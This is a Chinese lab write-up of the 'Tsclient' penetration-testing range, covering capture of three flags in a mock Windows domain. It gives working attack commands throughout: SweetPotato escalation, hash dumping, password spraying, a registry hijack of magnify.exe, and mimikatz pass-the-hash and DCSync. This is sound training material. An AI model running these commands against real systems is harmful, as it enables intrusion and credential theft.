春秋云镜Tsclient

##flag01

fscan扫一扫

弱口令mssql

先执行命令，发现不行需要激活插件，上方激活组件即可

在此路径发现有可写权限，cs上马

这里卡了半天（后面做题慢慢发觉是cs回连间隔太长，调小一点就好

C:/Users/Public/sweetpotato.exe -a "type C:\Users\Administrator\flag\flag01.txt"

我直接在MDUT执行

后边cs也行了，链接不咋稳定

flag02

在运行一次马提升个权限

shell c:\\users\\public\\sweetpotato.exe -a "c:\\users\\public\\beacon.exe"

信息搜集

shell net user

hashdump
[*] Tasked beacon to dump hashes
[+] host called home, sent: 82549 bytes
[+] received password hashes:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2caf35bb4c5059a3d50599844e2b9b1f:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
John:1008:aad3b435b51404eeaad3b435b51404ee:eec9381b043f098b011be51622282027:::

查看在线用户

shell quser || qwinst

shell type \\tsclient\c\credential.txt

这有问了一句你知道怎么去黑镜象吗？

上传fscan到入口机器进行内网信息收集

shell C:\Users\Public\fscan.exe -h 172.22.8.0/24

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.4
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.22.8.31     is alive
(icmp) Target 172.22.8.18     is alive
(icmp) Target 172.22.8.15     is alive
(icmp) Target 172.22.8.46     is alive
[*] Icmp alive hosts len is: 4
172.22.8.15:445 open
Open 1.txt error, open 1.txt: Access is denied.
172.22.8.46:445 open
Open 1.txt error, open 1.txt: Access is denied.
172.22.8.18:1433 open
Open 1.txt error, open 1.txt: Access is denied.
172.22.8.31:445 open
Open 1.txt error, open 1.txt: Access is denied.
172.22.8.18:445 open
Open 1.txt error, open 1.txt: Access is denied.
172.22.8.46:139 open
Open 1.txt error, open 1.txt: Access is denied.
172.22.8.15:139 open
Open 1.txt error, open 1.txt: Access is denied.
172.22.8.31:139 open
Open 1.txt error, open 1.txt: Access is denied.
172.22.8.15:135 open
Open 1.txt error, open 1.txt: Access is denied.
172.22.8.46:135 open
Open 1.txt error, open 1.txt: Access is denied.
172.22.8.18:139 open
Open 1.txt error, open 1.txt: Access is denied.
172.22.8.31:135 open
Open 1.txt error, open 1.txt: Access is denied.
172.22.8.18:135 open
Open 1.txt error, open 1.txt: Access is denied.
172.22.8.46:80 open
Open 1.txt error, open 1.txt: Access is denied.
172.22.8.18:80 open
Open 1.txt error, open 1.txt: Access is denied.
172.22.8.15:88 open
Open 1.txt error, open 1.txt: Access is denied.
[*] alive ports len is: 16
start vulscan
[*] NetInfo 
[*]172.22.8.46
   [->]WIN2016
   [->]172.22.8.46
Open 1.txt error, open 1.txt: Access is denied.
[*] NetInfo 
[*]172.22.8.31
   [->]WIN19-CLIENT
   [->]172.22.8.31
Open 1.txt error, open 1.txt: Access is denied.
[*] WebTitle http://172.22.8.18        code:200 len:703    title:IIS Windows Server
Open 1.txt error, open 1.txt: Access is denied.
[*] NetBios 172.22.8.31     XIAORANG\WIN19-CLIENT         
Open 1.txt error, open 1.txt: Access is denied.
[*] NetInfo 
[*]172.22.8.18
   [->]WIN-WEB
   [->]172.22.8.18
   [->]2001:0:348b:fb58:89e:266e:d89d:9382
Open 1.txt error, open 1.txt: Access is denied.
[*] NetBios 172.22.8.15     [+] DC:XIAORANG\DC01           
Open 1.txt error, open 1.txt: Access is denied.
[*] NetInfo 
[*]172.22.8.15
   [->]DC01
   [->]172.22.8.15
Open 1.txt error, open 1.txt: Access is denied.
[*] NetBios 172.22.8.46     WIN2016.xiaorang.lab                Windows Server 2016 Datacenter 14393
Open 1.txt error, open 1.txt: Access is denied.
[*] WebTitle http://172.22.8.46        code:200 len:703    title:IIS Windows Server
Open 1.txt error, open 1.txt: Access is denied.
[+] mssql 172.22.8.18:1433:sa 1qaz!QAZ
Open 1.txt error, open 1.txt: Access is denied.
已完成16/16

###内网渗透

代理搭建

中途因为这里卡了半天加上有事，时隔多天从这里开始做的

尽量不要使用cs的代理转发！！，太难用了说实话，不知道是啥问题，特别不稳定。建议用frp

上传到靶机启动，在搭本地代理就可以

c:\\users\\public\\frpc.exe -c "c:\\users\\public\\frpc.ini"

使用crackmapexec进行密码喷洒（看看那台机器能登录上

proxychains -q crackmapexec smb 172.22.8.0/24 -u 'Aldrich' -p 'Ald@rLMWuy7Z!#'

利用脚本修改密码

proxychains -q python3 smbpasswd.py xiaorang.lab/Aldrich:'Ald@rLMWuy7Z!#'@172.22.8.15 -newpass 'Whoami@666'

修改密码后，经过测试发现只能登录172.22.8.46这台机器

Aldrich@xiaorang.lab
Whoami@666

连上之后发现主机不出网

利用172.22.8.18转发上线CobaltStrike

根据之前的提示映像劫持提权

get-acl -path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" | fl *

发现NT AUTHORITY\Authenticated Users可以修改注册表
即所有账号密码登录的用户都可以修改注册表，利用这个性质，修改注册表，使用放大镜进行提权

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" /v "Debugger" /t REG_SZ /d "c:\windows\system32\cmd.exe" /f

然后锁定这台电脑。右下角放大镜会跳出命令行，执行木马

看到上线的system,拿到flag2

shell type C:\Users\Administrator\flag\flag02.txt

flag03

拿下域控

域用户信息收集

logonpasswords

shell net user /domain

域管用户信息收集

shell net group "domain admins" /domain
发现win2016$在域管组里，即机器账户可以Hash传递登录域控。

利用mimikatz注入机器账户的hash

shell C:\\Users\\Public\\mimikatz.exe "privilege::debug" "sekurlsa::pth /user:WIN2016$ /domain:xiaorang.lab /ntlm:b47c845655f06fb51ede6767aabbb33f" "exit"

shell C:\\Users\\Public\\mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:xiaorang.lab  /user:Administrator" "exit"

type C:\Users\Administrator\flag\flag03.txt

总结

过程蛮艰辛的，遇到了cs代理转发，说实话，真难用，不稳定，还得是frp.通过这个题我也是真切的感受到了frp才是真神。稳定不说，速度还快，nice!

也了解到了密码喷洒，就是当前网段进行特定用户和密码进行挨个测试

了解到了域渗透的一些步骤，

①搜集用户账户密码cs自带 ，或者猕猴桃也行

logonpasswords

②收集域用户

net user /domain

③进一步查找域管理员

net group "domain admins" /domain

④利用mimikatz注入机器账户的hash

C:\\Users\\Public\\mimikatz.exe "privilege::debug" "sekurlsa::pth /user:WIN2016$ /domain:xiaorang.lab /ntlm:b47c845655f06fb51ede6767aabbb33f" "exit"

⑤利用mimikatz dcsync dump域控hash

C:\\Users\\Public\\mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:xiaorang.lab  /user:Administrator" "exit"
 
C:\\Users\\Public\\mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:xiaorang.lab /all /csv" "exit"